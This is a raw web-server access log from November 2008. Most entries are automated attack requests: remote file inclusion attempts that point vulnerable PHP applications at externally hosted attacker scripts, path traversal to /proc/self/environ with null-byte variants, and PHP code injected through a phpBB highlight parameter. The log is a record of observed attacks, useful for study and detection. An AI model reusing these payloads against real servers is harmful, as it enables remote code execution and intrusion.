24.143.139.77 - - [15/Nov/2008:20:06:54 -0600] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
24.143.139.77 - - [15/Nov/2008:20:06:55 -0600] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
85.119.152.5 - - [15/Nov/2008:20:07:17 -0600] "GET /logs///contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 332 "-""libwww-perl/5.48"
85.119.152.5 - - [15/Nov/2008:20:07:17 -0600] "GET ///contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 327 "-""libwww-perl/5.48"
89.218.85.18 - - [15/Nov/2008:20:07:35 -0600] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://impactkiller.is-the-boss.com/tst.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
89.218.85.18 - - [15/Nov/2008:20:07:36 -0600] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://impactkiller.is-the-boss.com/tst.txt???? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
70.85.192.194 - - [15/Nov/2008:20:08:17 -0600] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ns1.police4.go.th/appserv/idfeelcomz.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
70.85.192.194 - - [15/Nov/2008:20:08:17 -0600] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ns1.police4.go.th/appserv/idfeelcomz.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
70.85.192.194 - - [15/Nov/2008:20:08:17 -0600] "GET /logs/access_log.1217721600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://ns1.police4.go.th/appserv/idfeelcomz.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
137.99.7.242 - - [15/Nov/2008:20:08:37 -0600] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 2.0.50727)"
208.69.123.58 - - [15/Nov/2008:20:09:22 -0600] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 360 "-""libwww-perl/5.79"
208.69.123.58 - - [15/Nov/2008:20:09:23 -0600] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
216.75.35.118 - - [15/Nov/2008:20:10:18 -0600] "GET /logs/index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://www.elitewheels.ru/images/inc?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
216.75.35.118 - - [15/Nov/2008:20:10:19 -0600] "GET /index.php?option=com_rss&Itemid=&mosConfig_absolute_path=http://www.elitewheels.ru/images/inc?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
72.55.133.37 - - [15/Nov/2008:20:10:19 -0600] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://elitewa.webng.com/22.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.811"
61.109.250.156 - - [15/Nov/2008:20:14:01 -0600] "GET /logs///vwar/backup/errors.php?error=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
61.109.250.156 - - [15/Nov/2008:20:14:01 -0600] "GET ///vwar/backup/errors.php?error=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
61.109.250.156 - - [15/Nov/2008:20:14:01 -0600] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
61.109.250.156 - - [15/Nov/2008:20:14:01 -0600] "GET ///vwar/backup/errors.php?error=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
61.109.250.156 - - [15/Nov/2008:20:14:01 -0600] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
61.109.250.156 - - [15/Nov/2008:20:14:01 -0600] "GET /logs///vwar/backup/errors.php?error=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
24.143.139.77 - - [15/Nov/2008:20:15:14 -0600] "GET /logs/access_log.1206230400//errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
24.143.139.77 - - [15/Nov/2008:20:15:14 -0600] "GET //errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
24.143.139.77 - - [15/Nov/2008:20:15:15 -0600] "GET /logs//errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
140.130.101.5 - - [15/Nov/2008:20:15:37 -0600] "GET /logs///vwar/backup/errors.php?error=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
140.130.101.5 - - [15/Nov/2008:20:15:37 -0600] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
140.130.101.5 - - [15/Nov/2008:20:15:37 -0600] "GET ///vwar/backup/errors.php?error=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
85.119.152.5 - - [15/Nov/2008:20:16:18 -0600] "GET /logs/access_log.1206230400///contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 354 "-""libwww-perl/5.48"
85.119.152.5 - - [15/Nov/2008:20:16:19 -0600] "GET ///contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 327 "-""libwww-perl/5.48"
85.119.152.5 - - [15/Nov/2008:20:16:19 -0600] "GET /logs///contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 332 "-""libwww-perl/5.48"
24.143.139.77 - - [15/Nov/2008:20:17:18 -0600] "GET /logs///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
24.143.139.77 - - [15/Nov/2008:20:17:19 -0600] "GET ///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
140.130.101.5 - - [15/Nov/2008:20:21:20 -0600] "GET ///vwar/backup/errors.php?error=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
140.130.101.5 - - [15/Nov/2008:20:21:20 -0600] "GET /logs///vwar/backup/errors.php?error=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
140.130.101.5 - - [15/Nov/2008:20:21:20 -0600] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
72.55.133.37 - - [15/Nov/2008:20:22:19 -0600] "GET /logs/access_log.1214179200//appserv/main.php?appserv_root=http://elitewa.webng.com/22.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.811"
72.55.133.37 - - [15/Nov/2008:20:22:19 -0600] "GET //appserv/main.php?appserv_root=http://elitewa.webng.com/22.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.811"
72.55.133.37 - - [15/Nov/2008:20:22:20 -0600] "GET /logs//appserv/main.php?appserv_root=http://elitewa.webng.com/22.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
72.55.133.37 - - [15/Nov/2008:20:22:26 -0600] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://elitewa.webng.com/22.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.811"
213.207.110.102 - - [15/Nov/2008:20:24:32 -0600] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 365 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
213.207.110.102 - - [15/Nov/2008:20:24:36 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 338 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
213.207.110.102 - - [15/Nov/2008:20:24:36 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 343 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
72.55.133.37 - - [15/Nov/2008:20:24:54 -0600] "GET /logs/access_log.1206144000//appserv/main.php?appserv_root=http://elitewa.webng.com/22.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.811"
72.55.133.37 - - [15/Nov/2008:20:24:54 -0600] "GET //appserv/main.php?appserv_root=http://elitewa.webng.com/22.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.811"
72.55.133.37 - - [15/Nov/2008:20:24:54 -0600] "GET /logs//appserv/main.php?appserv_root=http://elitewa.webng.com/22.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
72.30.79.42 - - [15/Nov/2008:20:25:00 -0600] "GET /logs/access_log.1187654400 HTTP/1.0" 200 148028 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
140.130.101.5 - - [15/Nov/2008:20:28:07 -0600] "GET /logs/access_log.1205366400%20%20///vwar/backup/errors.php?error=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
61.109.250.156 - - [15/Nov/2008:20:28:58 -0600] "GET /logs/access_log.1205366400///vwar/backup/errors.php?error=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
61.109.250.156 - - [15/Nov/2008:20:29:13 -0600] "GET /logs/access_log.1205366400///vwar/backup/errors.php?error=http://www.hondooo.de//components/com_extcalendar/lib/data/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
213.207.110.102 - - [15/Nov/2008:20:30:02 -0600] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
213.207.110.102 - - [15/Nov/2008:20:30:02 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
213.207.110.102 - - [15/Nov/2008:20:30:04 -0600] "GET /logs/access_log.1205366400/errors.php?error=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 321 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
213.207.110.102 - - [15/Nov/2008:20:30:04 -0600] "GET /errors.php?error=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 294 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
140.130.101.5 - - [15/Nov/2008:20:30:15 -0600] "GET ///vwar/backup/errors.php?error=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
140.130.101.5 - - [15/Nov/2008:20:30:15 -0600] "GET /logs///vwar/backup/errors.php?error=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
140.130.101.5 - - [15/Nov/2008:20:30:15 -0600] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
213.207.110.102 - - [15/Nov/2008:20:30:16 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
213.207.110.102 - - [15/Nov/2008:20:30:17 -0600] "GET /logs/errors.php?error=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 299 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
213.207.110.102 - - [15/Nov/2008:20:30:26 -0600] "GET /errors.php?error=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
213.207.110.102 - - [15/Nov/2008:20:30:26 -0600] "GET /logs/errors.php?error=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
213.207.110.102 - - [15/Nov/2008:20:30:26 -0600] "GET /logs/access_log.1205366400/errors.php?error=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
213.207.110.102 - - [15/Nov/2008:20:32:52 -0600] "GET /errors.php?error=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
213.207.110.102 - - [15/Nov/2008:20:32:52 -0600] "GET /logs/errors.php?error=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
213.207.110.102 - - [15/Nov/2008:20:32:52 -0600] "GET /logs/access_log.1205366400/errors.php?error=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
89.218.85.18 - - [15/Nov/2008:20:33:34 -0600] "GET /logs/phphtml.php?htmlclass_path=http://impactkiller.is-the-boss.com/tst.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
89.218.85.18 - - [15/Nov/2008:20:33:34 -0600] "GET /logs/phphtml.php?htmlclass_path=http://impactkiller.is-the-boss.com/tst.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
89.218.85.18 - - [15/Nov/2008:20:33:34 -0600] "GET /phphtml.php?htmlclass_path=http://impactkiller.is-the-boss.com/tst.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
89.218.85.18 - - [15/Nov/2008:20:33:34 -0600] "GET /logs/phphtml.php?htmlclass_path=http://impactkiller.is-the-boss.com/tst.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
89.218.85.18 - - [15/Nov/2008:20:33:34 -0600] "GET /phphtml.php?htmlclass_path=http://impactkiller.is-the-boss.com/tst.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
89.218.85.18 - - [15/Nov/2008:20:33:35 -0600] "GET /phphtml.php?htmlclass_path=http://impactkiller.is-the-boss.com/tst.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
140.130.101.5 - - [15/Nov/2008:20:33:52 -0600] "GET /logs/access_log.1205366400%20%20///vwar/backup/errors.php?error=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
70.38.31.50 - - [15/Nov/2008:20:35:06 -0600] "GET /logs/access_log.1208304000//?path%5Bdocroot%5D=http://muconha.servegame.com:8090//appserv/shmbusgaid.txt%0D?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
70.38.31.50 - - [15/Nov/2008:20:35:06 -0600] "GET //?path%5Bdocroot%5D=http://muconha.servegame.com:8090//appserv/shmbusgaid.txt%0D?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
70.38.31.50 - - [15/Nov/2008:20:35:07 -0600] "GET /logs//?path%5Bdocroot%5D=http://muconha.servegame.com:8090//appserv/shmbusgaid.txt%0D?? HTTP/1.1" 200 107164 "-""libwww-perl/5.805"
140.130.101.5 - - [15/Nov/2008:20:36:55 -0600] "GET /logs/access_log.1208044800%20%20///vwar/backup/errors.php?error=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
24.143.139.77 - - [15/Nov/2008:20:37:22 -0600] "GET /logs//lostpasswd.php?env[include_prefix]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
24.143.139.77 - - [15/Nov/2008:20:37:22 -0600] "GET //lostpasswd.php?env[include_prefix]=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
140.130.101.5 - - [15/Nov/2008:20:39:04 -0600] "GET /logs/access_log.1205366400%20%20///vwar/backup/errors.php?error=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
213.207.110.102 - - [15/Nov/2008:20:40:52 -0600] "GET /logs/access_log.1208044800/errors.php?error=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 321 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
213.207.110.102 - - [15/Nov/2008:20:42:14 -0600] "GET /logs/access_log.1208044800/errors.php?error=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
213.207.110.102 - - [15/Nov/2008:20:42:36 -0600] "GET /logs/access_log.1208044800/errors.php?error=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
140.130.101.5 - - [15/Nov/2008:20:43:12 -0600] "GET /logs/access_log.1208044800%20%20///vwar/backup/errors.php?error=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
213.207.110.102 - - [15/Nov/2008:20:46:21 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
213.207.110.102 - - [15/Nov/2008:20:46:21 -0600] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
213.207.110.102 - - [15/Nov/2008:20:46:22 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
216.144.229.170 - - [15/Nov/2008:20:46:29 -0600] "GET /logs/errors.php?error=http://www.fm24forum.de/phpBB2/cache/i?? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
216.144.229.170 - - [15/Nov/2008:20:46:29 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.fm24forum.de/phpBB2/cache/i?? HTTP/1.1" 404 318 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
216.144.229.170 - - [15/Nov/2008:20:46:29 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 318 "-""XXXXXX"
216.144.229.170 - - [15/Nov/2008:20:46:29 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 318 "-""XXXXXX"
216.144.229.170 - - [15/Nov/2008:20:46:29 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.fm24forum.de/phpBB2/cache/i?? HTTP/1.1" 404 313 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
216.144.229.170 - - [15/Nov/2008:20:46:29 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 313 "-""XXXXXX"
216.144.229.170 - - [15/Nov/2008:20:46:30 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-""XXXXXX"
216.144.229.170 - - [15/Nov/2008:20:46:35 -0600] "GET /errors.php?error=http://www.fm24forum.de/phpBB2/cache/i?? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
208.69.123.58 - - [15/Nov/2008:20:48:29 -0600] "GET /logs/access_log.1214956800//include/write.php?dir=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
208.69.123.58 - - [15/Nov/2008:20:48:29 -0600] "GET //include/write.php?dir=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
208.69.123.58 - - [15/Nov/2008:20:48:29 -0600] "GET /logs//include/write.php?dir=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
208.69.123.58 - - [15/Nov/2008:20:48:29 -0600] "GET /logs/access_log.1216425600//include/write.php?dir=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
140.130.101.5 - - [15/Nov/2008:20:48:40 -0600] "GET /logs/access_log.1205366400///vwar/backup/errors.php?error=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
140.130.101.5 - - [15/Nov/2008:20:49:22 -0600] "GET /logs/access_log.1208044800%20%20///vwar/backup/errors.php?error=http://apple.cs.pusan.ac.kr/technote7/data/board/pmmember/img/data/copyright.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
208.69.123.58 - - [15/Nov/2008:20:49:37 -0600] "GET /logs/access_log.1216425600%20//include/write.php?dir=http://beralios.altervista.org/sorgente.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
213.248.62.97 - - [15/Nov/2008:20:51:52 -0600] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
213.248.62.97 - - [15/Nov/2008:20:51:52 -0600] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
213.248.62.97 - - [15/Nov/2008:20:51:52 -0600] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
213.248.62.97 - - [15/Nov/2008:20:51:52 -0600] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
219.94.148.24 - - [15/Nov/2008:20:52:05 -0600] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
219.94.148.24 - - [15/Nov/2008:20:52:06 -0600] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
219.94.148.24 - - [15/Nov/2008:20:52:11 -0600] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
219.94.148.24 - - [15/Nov/2008:20:52:11 -0600] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
124.38.187.59 - - [15/Nov/2008:20:52:38 -0600] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.38.187.59 - - [15/Nov/2008:20:52:39 -0600] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
208.83.209.15 - - [15/Nov/2008:20:52:51 -0600] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 294 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
208.83.209.15 - - [15/Nov/2008:20:52:51 -0600] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 299 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
124.38.187.59 - - [15/Nov/2008:20:53:09 -0600] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.iwsbr.net/vitinho/test.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
